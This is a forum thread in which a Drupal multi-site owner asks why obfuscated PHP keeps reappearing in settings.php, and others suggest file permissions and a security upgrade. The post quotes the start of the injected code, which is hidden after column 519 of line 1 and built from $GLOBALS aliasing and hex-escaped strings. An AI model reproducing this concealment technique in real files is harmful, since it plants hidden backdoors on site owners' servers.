I keep a server on AWS
I have a computer with Multi site setup
I initially installed a regular Drupal and added subdirectories under …/sites/ with name of the domain such as “sample.com” I keep installing web sites in the same way and until now everything went OK.
Last few days I tried to install additional sites and came across a message (warning ) of something in line 1 of setting.php
Setting .php contain on line 1 only “<?php” but looking deeper I found that starting line 1 col 519 there is a long line of code (place there starting on col: 519 to hide it from an unsuspecting eye ) and it runs all the way to col:11679 (a very long line!)
The beginning of it looks like this:
$GLOBALS['m152ad'];global$m152ad;$m152ad=$GLOBALS;$m152ad['t94f724b']="\x5a\x30\x66\x53\x6e\x37\x61\x49\x7e\x33\x27\xa\x45\x62\x39\x73\x4e\x34\x5c\x2b\x6b\x36\x58\x5f
My setting.php is a copy of “example.sites.php” and I found that this was also infected with the same long string.
I clean both files and remove the extra code.
Upon installation I get the warning again and the long string is back
If I clean the string before running the site for the first time the site is clean.
Before the installation step I cleaned the file and it got infected during the installation, from this I conclude that the code is there some ware and is being copy during the installation
I need to know where it is or where to look for it so I can remove it from my system.

Hope someone can help.
Best regards
Shimon Dekel

Comments

nevets’s picture

Is settings.php writable? (It shouldn't)

ShimonDekel’s picture

it is no longer writeable.
But how do I get read of it, it comes back upon installing the site so apparently it is some ware deep in there.

yelvington’s picture

ShimonDekel’s picture

I will try all of them.

yelvington’s picture

carloswwe’s picture

Hi,

There was a Drupal Security vulnerability prior to Drupal 7.34 / 6.34 Release. I would first upgrade Drupal 7.34/6.34 and then fix the settings.php file.